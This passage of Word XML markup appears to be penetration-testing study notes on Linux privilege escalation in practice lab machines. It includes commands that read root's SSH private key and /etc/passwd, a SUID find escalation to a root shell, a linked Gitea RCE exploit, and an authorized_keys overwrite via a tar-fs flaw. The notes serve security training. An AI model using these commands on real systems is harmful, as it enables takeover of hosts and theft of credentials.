    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then it will ask us for a command, and we can run commands like reading root private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /root/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can SSH as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—---------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1278">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">extplorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we were in the disk group, which was highlighted in yellow by linPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="112" name="image136.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image136.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1279"/>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39DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It can read any file, and write to files not owned by root. So they used it to read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and they found a hashed password for root which they cracked and switched to root user using it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is also a hacktricks on it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1280">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe#disk-group</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rv3snp8ni0o9" w:id="541"/>
      <w:bookmarkEnd w:id="541"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using string, and -h/--help and -v/--version to find information about unknown binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a binary that you don't understand and it runs with SUID or something special, then try running it with -h/--help and -v/--version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039E9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1281">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mzeeav</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we had a binary that ran with SUID and we ran --version and saw that it was a "find" binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4368800" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1282"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="43688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39EB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we can use the find SUID GTFO bins exploit to exploit it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1164"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/fileS . -exec /bin/bash -p \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to look at unknown binaries (also seen in XXXXXXXXX challenge labs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen </w:t>
      </w:r>
      <w:hyperlink r:id="rId1283">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Workaholic</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9F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8d5t3yq8lwt3" w:id="542"/>
      <w:bookmarkEnd w:id="542"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gitea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gitea 1.7.5 was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1284">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Roquefort</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. It was an unauthenticated RCE and very easy. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1285">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49383</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A more complex attack vector via Gite was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1286">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We had to look at the git logs using gitea, as well as seeing that further examination of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file reveals that the application is using a vulnerable version of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar-fs package</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is known to be affected by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-12905</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This vulnerability allows for arbitrary file write/overwrite, which can potentially lead to remote code execution. We then used this to overwrite authorized_keys of a user to include our own new public key so we can login as that user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1287">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
